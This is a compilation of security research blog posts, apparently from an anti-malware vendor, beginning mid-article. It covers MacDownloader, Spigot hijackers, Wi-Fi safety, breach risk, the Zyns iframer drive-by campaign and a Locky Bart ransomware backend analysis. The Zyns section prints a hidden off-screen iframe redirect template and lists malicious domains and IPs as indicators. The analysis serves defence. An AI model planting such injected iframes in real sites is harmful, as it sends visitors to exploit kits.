If a password is entered, the app will then gather some information about the system and write it to /tmp/applist.txt. This file and the user’s keychains are then uploaded to the command and control (C&C) server. Since the applist.txt file contains the user’s username and password, thanks to the password request, this would allow the hackers to unlock the keychain files, accessing all the passwords stored within. (Fortunately, the C&C server is now offline.)
The malware appears to contain some code designed to download a payload from the C&C server and install it persistently in the system, Guarnieri and Anderson found that bugs in the code prevented that code from working properly. Thus, MacDownloader does not install anything persistently. Once it has been run, it’s done.
This malware continues the recent malware trends on macOS. In the past year, nearly all true Mac malware (as opposed to adware) has been 1) lame and 2) targeted.
Mac malware has a historical tendency towards lameness, not necessarily because the code itself is poor (though that’s often the case), but because it always uses the same old boring method of persistence: a launch agent/daemon that loads a hidden process. This makes Mac malware easy to spot and easy to remove.
In the case of MacDownloader, the malware takes “lame” to a new level, with poor code, sloppy UI, and non-functional persistence. (Though perhaps it should be given a little extra credit for trying – albeit unsuccessfully – to use an older persistence technique involving rc.common, which most people would not be looking for.)
Most Mac malware in recent years, with a few exceptions, have been targeted attacks. Such attacks have targeted human rights advocates, government agencies, research institutions, and others. This malware is no different, as it is being used to target US defense contractors via spearphishing, a technique in which links to specially-crafted malicious sites are sent to targeted individuals or groups via e-mail or other messaging services.
The majority of Mac users will never see this malware and one would hope that most of those who do would not be fooled by the clumsy behavior. Still, it doesn’t take many to fall for the tricks employed by this malware to get access to sensitive accounts within an organization, which can be used to pwn the entire company.
There is a large family of Spigot browser hijackers that all have a lot in common. So by giving you a description of them we hope this will help you to avoid any similar and new ones that might come along.Targeted browsers
For some, but not all browser hijackers in this family there are extensions for Firefox and Google Chrome. In Internet Explorer they change the default Search Provider and the startpage. Trying to install the PUP on Edge will get you nothing but an “Unsupported Browser” notice.
Recognizing the sites
The websites where these hijackers can be downloaded will show you the EULA —
–explaining to you, “the User”, what the downside of installing “the Software” might be.
The Software is a free desktop application that offers you direct links to websites from your new preferred homepage and saves your new preferred home page and/or new tab page. When we set your Browser’s settings using the Software, they will be saved automatically on Chrome™, Firefox®, and Internet Explorer®. As part of the installation process of the Software, we may change your Internet Browser settings and/or provide you with the ability to opt to make changes to your Internet Browser settings.Download locations
Downloads typically come from proinstall-download[dot]com or report-download[dot]com (both blocked by our Web Protection module). Both of these domains are registered with GoDaddy (no surprise there!). The download location changed not too long ago.
It used to be secure[dot]fileldr08[dot]com and from the screenshot above you can see why we categorized these browser hijackers as PUP.Optional.Spigot. Worth noting is that after they switched away from the above download location, I was unable to install the extensions on Google Chrome. It failed to download and offer the extension. But this got fixed after a few weeks.The startpage
The new startpage for the affected browser is a typical search page with a toolbar and some shortcuts, pointing to sites where you can find the information or functionality that the hijacker promised to provide, supplemented by local weather and social media links.Installation guidance
Another typical behavior, that these hijackers copied from the likes of Mindspark, is the right in your face installation guidance with huge green arrows pointing out what your next step should be.
You can find some examples among the removal guides on our forums:
Spigot browser hijackers of this family are easy to recognize and in our opinion hardly worth installing because they add no more functionality than a few bookmarks. We hope this post helps you to avoid them in the future.
As always: Save yourself the hassle and get protected.
Last week, we took a look at the theories behind preventing users from clicking everything (don’t worry, you’re allowed to click that), a deep dive into Locky Bart Ransomware, and a long term drive-by download campaign. We also explored why you should care about data breaches and also released our 2016 State of Malware Report.
Elsewhere from the last week:
Stay safe, everyone!
The Malwarebytes Lab
For anyone that travels, uses their phone in public, or stays constantly connected to the internet anywhere they go—which probably means you, Wi-Fi security should be a top priority. This day in age, we use wireless internet connection anywhere we can find, but often times, don’t think about the dangers of jumping on a public network and getting hacked. The term “hack” and “data breach” seem to be more common than ever, in the news and media—and there’s a reason for that. The increase of mobile device usage and connected technologies everywhere have been a blessing and a new curse because it has indirectly made your information and devices more susceptible. Here’s the 101 on Wi-Fi security and what you can do to keep the personal information stored on your mobile devices, well, personal.
1. Free doesn’t mean safe.
Just because Wi-Fi is free, doesn’t mean you’re in the clear for potential security breaches. Know that even if you have to log in with a password, likely provided by the establishment you’re in, it doesn’t mean your online activities are encrypted. Also beware of random Wi-Fi hotspots or free Wi-Fi networks that appear to be open to join. These could be made by hackers themselves as a way take advantage of those who aren’t careful and join.
2. Don’t be a victim.
It’s inevitable that you will use a public network to connect to the internet at some point in time. This is especially the case when you travel and need to do work in a public setting such as an airport, coffee shop, or hotel. While you can take advantage of this public connection, do take precaution as to what kind of activity you choose to do on your laptop, tablet, or smartphone. Avoid going on sites that hold private, sensitive information like bank accounts. The last thing you want is to have your savings account drained because you decided to open up your banking app and expose how much money you have over a public network.
3. Practice public safety.
If you are on a public Wi-Fi network, make sure all the sites you’re browsing start with HTTPS and not HTTP. Traffic on websites beginning with HTTP is visible to hackers, so avoid putting yourself in that scenario all together. Additionally, you can change your wireless settings so that they do not automatically connect to available Wi-Fi. By doing this, you prevent unintentionally putting your mobile activity out in the public and your information at risk.
4. Protect your private domain.
As for your own Wi-Fi network, there are some key actions you can take to help secure it. Change the default SSID on your wireless internet network and create a strong password as an added security measure—avoid including words from the dictionary. Hackers have access to precomputed tables of common SSIDs and passwords, so this helps to stop them from cracking the code.
5. Get an alternative.
It may be hard to resist the free public Wi-Fi, but if you can afford it and see the value in Wi-Fi security protection, then get yourself a personal hotspot. Mobile network providers like T-Mobile offer various options with generous data plans that make the investment worth it. When you set up your Wi-Fi hotspot, still take the same precautions as you would for your home network, like changing the defaults for added security. If a hotspot is not an option for you, then check to see if the company you work for has a Virtual Private Network (VPN). These are secure networks and definitely beat out public networks and subjecting yourself to hackers when you’re just trying to do work outside the office.
It’s a rough cyber world out there, but you can survive it. By being aware of Wi-Fi security and taking the right measures you can keep your devices and private information safe and surf the internet as you please.
Safer Internet Day is an awareness-raising campaign that started in Europe more than a decade ago. Hosted by ConnectSafely.org, Safer Internet Day gained official recognition in the US in late 2012, with a joint agreement between the Department of Homeland Security and the European Commission to work together to build a better Internet for young people. Now, it is celebrated in more than 100 countries worldwide.
The theme for this year’s Safer Internet Day celebration is “Be the change: Unite for a better Internet.” Organizers are looking for people to post about positive social actions online—whether it’s a random act of kindness or a full-on flash mob. Here are some ways you can participate:
In the meantime, bone up on security basics to stay safe online today—and every day. Here are a few starter articles that can help you remain malware-free in 2017.
Now get out there and be safe!
2016 was the year that reminded us how important prevention is, no matter what type of user you may be. Indeed ransomware dominated the threat landscape and was heavily distributed via phishing emails, compromised websites, or malicious ads. With such a threat that encrypts your valuable data, there is often times very little you can do after the fact.
To give you an idea of how fast ransomware progressed, we saw a 267 percent increase between January 2016 and November 2016, with over 400 different variants in total. The most impacted users were businesses, possibly correlated with the increase in malicious spam during the same time period. Several large botnets were used to send phishing emails containing Office documents or scripts purporting to be invoices or other such lure.
While malware authors mostly relied on ransomware to make the bulk of their revenues, we noted an increase in ad fraud as well. Malware infested computers that visit websites and click on ads within a hidden desktop are responsible for billions of dollars in losses for advertisers. But they are also a threat to end users as they can also get infected with other types of malware as a result of this browsing activity.
Botnets continued to become a huge threat, not only as spam machines like mentioned earlier but also to launch severe Distributed Denial of Service attacks that impact large portions of the Internet. While traditional PCs continue to be used as bots, internet enabled devices, also known as IoT, were a low hanging fruit threat actors went after. Security cameras, routers, and many other internet connected devices are often poorly secured with default passwords or security flaws that will rarely ever get patched by their owners. Those same devices were used to take down other websites and wreak havoc across the internet.
Mobile malware keeps on evolving with better anti AV tricks while end users continue to get infected mostly by downloading free apps from non authorized stores. Brazil, Indonesia, the Philippines, and Mexico were some of the top countries affected by mobile malware.
In 2017 we can only expect ransomware to become more aggressive and have a direct impact on our lives as healthcare facilities or critical infrastructure are affected. Unless there are major laws forcing manufacturers to make IoT devices more secure out of the box, we can expect the size of such botnets to grow bigger and pose an even more dire threat to the internet.
2017 will also be the year where we see whether exploit kits will finally return as the top infection method but we can only expect spam campaigns to remain strong and steady especially against small and medium businesses, while larger organizations may also get targeted more frequently via clever phishing attacks.
To read more about our malware in 2016 and our predictions, please download the report here.
Because as the size of your organization increases, the probability that an individual employee’s company email is in that breach rises to 1. That lone employee is going to be suffering some unfortunate impacts, from identity theft, financial scams, blackmail, and even death threats (as seen in the Ashley Madison breach). There’s an organizational impact as well: a single compromised account can serve as a launching point for reconnaissance, phishing waves, or a pivot point for a further attack. But wait? What if the exposure is a company webmail that is isolated from the main corporate network? There will be an employee who reuses their password. But what if your company has a policy against that? Then there will definitely be employees who reuse their passwords. Unless your organization uses password managers, a single breached account has a very good chance of being a pivot point for more serious attacks.
Email isn’t the end of sensitive data loss, unfortunately. Stack Overflow, a perennial favorite for developers working out knotty problems, frequently has proprietary code cut and pasted into the site, sometimes with network configuration data attached. Pastebin can and does have network details and code with misconfigured expiration dates, waiting to be scooped up. And LinkedIn is an absolute goldmine for mapping potential accesses to employees. So how do you go about plugging leaks? A three-point strategy can get you started.
1. Legal – This is most important for an internal data protection policy because there are some hard limits to what you can and cannot tell employees to post online. Consulting with an attorney can set some appropriate bounds for what sort of mitigations you want to implement. Further, a lawyer well briefed on cyber threats can be a valuable asset in issuing takedowns of offending material.
2. Stovepipe breaking – Communicating directly with first line managers to discover how and why data leaves your organization should constitute the bulk of any data loss mitigation plan. With the exception of the lone knucklehead who signs up for an inappropriate site with a company email (you have one of these, I promise) most data loss occurs because businesses use cases do not align to existing security policy, and users are going to find a workaround. Does your default computing environment have tooling sufficient for developers to do their job or are you 2 versions behind industry standards? How does your security team get a piece of malware off an infected host and onto a test machine? What’s the default attachment size on the corporate mail instance? And if you run on a virtualized environment, what’s the default memory allocation and how much hassle does an employee have to suffer to get it raised? These may appear on the surface to be small, too in-the-weeds type questions. They are in fact very predictable preludes to data loss or a full on breach, because in each instance an employee is incentivized to break policy to get their job done. This is fortunately preventable – talk to your first line management and gather use cases, before policy gets set.
3. SOC feedback – Last but also important is to have your security team aware of company data when it lands in public view. This doesn’t have to be onerous or time consuming; simple crawlers with a list of vetted keywords and domains run as a cron job can go a long way towards finding data where it shouldn’t be. Of course the best case scenario is to prevent leaks before they happen, but swift detection and takedowns (remember you spoke to your lawyer?) can mitigate damage.
3rd party data breaches are happening at an accelerating pace and show no signs of abating. Secondary effects of these breaches tend to spread tendrils of insecurity much further than the individual site in question. Take some time now to talk to managers, your legal department, and your SOC now, and you can make sure that the next breach won’t be catastrophic for you as well.
We often get asked about drive-by download attacks, how they work, and specifically about what sites people may have visited just prior to getting infected. This is an interesting aspect when tracking campaigns and what they lead to.
Typically, one can divide the drive-by landscape into two categories: malvertising and compromised websites. The former involves legitimate websites that rely on advertising as their source of revenue. Crooks have long been able to insert themselves into the ad delivery chain in order to push malicious code such that the simple fact of viewing a page with ads actually infects your computer. The latter is made of websites that have been hacked and injected with malicious code and are also used to redirect users to malicious content.
What we refer to as “campaigns” are specific attributes from the same threat actor or group similar to what is used to categorize malware families. There are many different campaigns for both streams, some come and go while others stick around for long periods of time. For instance, EItest is one particular campaign for compromised sites which has been going on for years.
Campaigns are an essential part of the underground ecosystem because they continuously feed potential new victims into the infection funnel which ultimately translates into revenues for online criminals.
Today we are taking a look at an iframe campaign (Zyns iframer) that has been going on since at least 2014. There are specific indicators of compromise (IOCs) that haven’t really changed over time and the underlying structure has also remained pretty similar. We have seen this attack chain primarily associated with malvertising, and in particular via adult sites. During its course, we noted several different exploit kits being pushed by this campaign (Angler EK, Nuclear Pack, Neutrino EK, RIG EK).Patterns (IOCs)
The redirection infrastructure had very distinct patterns and also shared many of the same server IP addresses over time. We also saw the evolution from dynamic DNS (via sub domains) to domains on dubious top-level domains (TLDs).
URL patterns:/out.php?sid=1 /out.php?sid=3 /link.php /linkx.php
Server headers:HTTP/1.1 200 OK Server: Apache/2.2.22 (@RELEASE@) X-Powered-By: PHP/5.3.3
Redirection URL:<iframe src="[EK URL HERE]" width="468" height="60" style="position:absolute;left:-10000px;"></iframe> First spotted, 2014
Our earliest records are from the fall of 2014 with malvertising attacks mostly affecting Russian users. A capture from later that year shows a drive-by download from blogspot.ru via JetSwap, an “Active Promotion System!” where members and advertisers are linked together via an affiliate program. In this particular case, the advert loads a malicious iframe to qera.zyns.com which performs a 302 redirect to another domain qzertyu.myz.info and in turn redirects to the Angler exploit kit.
Payload: SmokeLoader.2014-2015 transition
The campaign kept going as 2015 rolled in with an almost identical structure. Note the addition of ‘link.php’ to the domain in charge of loading iframes to EK. Angler wasn’t the only exploit kit used by these actors. For example we see Nuclear Pack below:
Sucuri Labs post shows another .wha.la domain involved in redirect:22.214.171.124 kophon.wha.la/out.php?sid=1
A piece of code containing the same iframe redirection structure was posted in May 2015 to an online PHP editor. It shows a distinct URL pattern for the RIG exploit kit (RIG EK version 3).
2016 was an interesting year for exploit kits with the disappearance of Angler EK in June. The capture shown below is one of the latest artifacts we have from Angler EK before it went missing.
Payload: JuicyLemon (ransomware).
As we know, criminals transitioned to Neutrino EK after Angler EK went down. During the next few months, up until sometime in September there was a mix of both Neutrino EK and RIG EK used by the actors behind this campaign. Below, Neutrino EK in July:
The campaign was spotted in late June by Malekal (link) via malvertising on adult sites (with Gootkit mentioned as the payload).
Malware Traffic Analysis wrote a blog entry shortly after (link):126.96.36.199 port 80 - glamgirltube.tk - GET /engine/classes/js/jquery.js - file with injected script 188.8.131.52 port 80 - fijir0.tk - GET /linkx.php - gate 184.108.40.206 port 80 - jy.neutralarbitrations.com - RIG EK
and in July Broad Analysis did too (link):220.127.116.11 – relaxtube.tk – GET /engine/classes/js/jquery.js – Rig EK REDIRECT 18.104.22.168 – waferako.cf – GET /linkx.php – Rig EK REDIRECT 22.214.171.124 – ds.pacificbeachcar.com – Rig EK LANDING PAGE
RIG EK (also known as RIG Standard), seen in September:
In early December, we noticed a slight change with a new domain used as a redirector. At the same time, there were several instances where two different RIG EKs were pushed from the same redirection chain, leading to two different malware payloads.
In January we started seeing the same redirector that had been pushing this campaign switch to a different chain, this time via compromised sites. This was interesting because throughout December, we were seeing the usual sequence of events with the standard iframe, even though this chain came via a different sid (sid 3) than the typical sid 1.
December 2016 (with sid=3)
Come January and we have a completely new pattern where an iframe is now inserted via a double chain of events, most notably malicious code injection that looked new to me within a WordPress plugin called Contact Form 7.
January 2017 (also with sid=3)
Payload: Gootkit.The end of the road?
In January, several different trails we were tracking began to disappear, showing that the Zyns iframer campaign was likely evolving or got merged into something else. The diversity of payloads and exploit kits may indicate there was no particular tie with any specific malware distributor.
Threat actors will buy traffic from various sources to push malware, with malvertising often being the top choice for its wide impact. This particular case is a mix of malvertising and bogus adult websites aimed at driving a lot of users into exploit kit landing pages.
To protect yourself against drive-by download attacks, the first thing to do is to ensure that your computer is fully up-to-date. Use Malwarebytes to stay safe from malicious websites and thwart exploits (known and unknown) before they launch their payload.
Thanks to @hasherezade for help with payload identification!IOCs
In this post we will cover the Locky Bart ransomware. The developers of Locky Bart already had 2 very successful ransomware campaigns running called “Locky” and “Locky v2”. After some users reported being infected with Locky Bart, we investigated it to find the differences as to gain greater knowledge and understanding of this new version.
The Locky Bart ransomware has new features that are different from its predecessors. It can encrypt a machine without any connection to the Internet. It also has a much faster encryption mechanism.
Our research would also indicate that the backend infrastructure of Locky Bart might be maintained by a different threat actor than the original versions. While the internals of the malicious binary share a great number of similarities, there were some notable differences.
These included: Comments in the code of the application, but more notably the kind of software used in the backend server.
This did not come as a surprise, as cyber-criminals are known to share, rent, sell, and even steal malicious code from one another.Analysis of Locky Bart’s binary
In their previous incarnations, Locky and Locky v2 used a simpler encryption process. They enumerated the files targeted for encryption, placed each in a password protected ZIP archive, and repeated this process until all the files were encrypted. The creators did not use the AES ZIP protection, but an older algorithm, and because of this, researchers were able to make a decrypting application.
Locky Bart performs a fairly straight forward set of actions to encrypt the victim’s files. They are as follows:
The function used to generate a seed, which is used to create a key to encrypt the files with. It uses variables like system time, process ID, thread ID, Process Alive Time, and CPU ticks to generate a random number.
The function used to enumerate and encrypt the files.
Bart will skip any folders with these strings in them.
The file-types that Bart targets to encrypt.
The string that Bart uses to make a Ransom Note. The “khh5cmzh5q7yp7th.onion” is the payment server, and the “AnOh/Cz9MMLiZMS9k/8huVvEbF6cg1TklaAQBLADaGiV” is a sample UID that would be sent with the URL to the server for the victim to make a payment. Remember that the UID is only an encrypted version of the key that can be used to decrypt a victim’s files.
How the creators of Bart Locky acquire the key is what differentiates this version from its predecessors. When the victim of the ransomware visits the URL to make their payment for the ransom, they are unknowingly sending their decryption key to the criminals.
Let’s break down the process in a more granular method, to better understand it.
This UID is useless to the victim though, because they do not have the private key to decrypt their files. However, the ransomware creator’s server does, meaning his server can not only use the UID to identify the victim, but also decipher the UID into their victim’s key upon payment of the ransom.
In the end, only the ransomware creators can decrypt the user’s files, and because of this feature, there is no need to access the malicious server to encrypt them.Locky Bart Software Protection technique
The Bart Locky binary also uses a software protection technique. This technique is known as code virtualization and is added to Bart Locky binary by using a program called “WPProtect”.
This makes reversing the binary significantly more difficult to disassemble and complicates stepping through the code, a technique used to understand what it does. Legitimate uses of this type of software are most typically seen in anti-piracy mechanisms. An example of a commercial version of this type of software would be Themida. The author of Bart Locky probably chose this particular anti-tampering mechanism as it is free, open source, and provides many features. This adoption of software protection techniques is a troubling development. These applications, including WPProtect, make reversing and analysis significantly more challenging.The Locky Bart server
The second half of Locky Bart is the server and backend. This server is used to provide the victims with a payment mechanism to pay the ransom.
The Bart Locky backend runs on a framework called yii. Yii is a high-performance PHP framework best for developing Web 2.0 applications.
This framework contains a wealth of information on the inner workings of Bart Locky.
TheYii debug panel that contained extensive information about the configuration server.
Access to this control panel revealed:
Locky Bart stores information in a MYSQL database. The credentials to the MYSQL server reside in a “Config” PHP file in the “Common” folder of the site. An example path looks like the following: /srv/common/config/main-local.php
The contents of Bart’s server MYSQL config file
The information contained in the MYSQL database consists of the victims Unique IDentifier, the encryption key, BitCoin Address, Paid Status, and Timestamps.
A small part of the table holding the ransomware information in the database.
The Locky Bart server also contains a second database that contains further information on the victims of the ransomware.
Locky Bart ransomware’s “Stats” table example.
A “ReadMe” file found on the server that seems to detail some features on the Stats database.
The Locky Bart server contains a “BTCwrapper.php” which used a “controller” method that exposes a BTC Wallet Class that all other PHP files can call. This class initiates a connection to the Bitcoin servers through a username and password. This class contained complete methods on controlling and using the main BTC wallet set up by the criminal to store all the money received. This wallet is emptied regularly. This class can create new BTC Addresses as well and had the ability to empty those wallets on payment to the main wallet. There were also methods to check on the status of payments from each victim.
Some of the functions that the BTCWrapper Class calls.
The first few functions of the BTCWrapper Class. The class uses CURL to contact a locally ran bitcoin server that communicates with the block chain.
The Locky Bart server had 2 Bitcoin addresses where victims’ payments were transferred to. The current one:
The current BTC address associated with Locky Bart has accumulated $ 7,671.60 in its life time.
And a second one, that was referenced in PHP configurations on the malicious server.
An older BTC address also associated with Locky Bart had accumulated $ 457,806.06.
The server portion of this ransomware was configured to function very similar to a legitimate business. It mirrored a “Support Ticket Department” where the user could contact the ransomware support for any issues they may have experienced.
The process was completely automated. The user would get infected and visit the site as their ransom note instructed. When they visited the site, the server would then generate their unique BTC address and present it to them automatically.
After this, if the user made the decision to pay the ransom, but if they had any questions, they could literally contact support.
If they did indeed make the decision to pay, they would proceed to buy Bitcoins through the many methods available (BTC ATM, LocalBitcoins – which allows you to meet people local to trade BTC for money or use banks and wiring like Western Union, or buy them with a credit card online).
Once the user has the amount specified by the ransomware in their own BTC Wallet, they would then transfer the money from their wallet to the Payment Address the Ransomware Payment Page generated for them.
The Ransomware Server checks every few minutes if a payment has been made for any of its victims and if the payment had been confirmed. Once the server verifies a payment they mark that victim in the Database as “Paid”.
When a victim is marked as “Paid” the server then generates a “Decryption Tool EXE” and writes the users Encryption Key in the binary of that exe, and presents a link to download it on the personal payment page of the victim. Later when the victim checks their payment page again, they will see the link, download the tool, and decrypt their files.
The generation of the victim’s decryption tool on the fly.Conclusion
This research into Locky Bart ransomware gives a great view of the side of a ransomware operation that we typically do not get to see, the backend. The criminals who run these operations do so on an extremely professional level, and users should always take an extra step in protecting themselves from these types of attacks.
Ransomware will continue to grow and get more advanced and users need to make sure they are protected in the form of backup’s, security application protection like Malwarebytes, and make sure they have some type of anti-ransomware technology protecting them from these advanced attacks. Users running Malwarebytes already have protection from ransomware, as Malwarebytes is equipped with our anti-ransomware technology.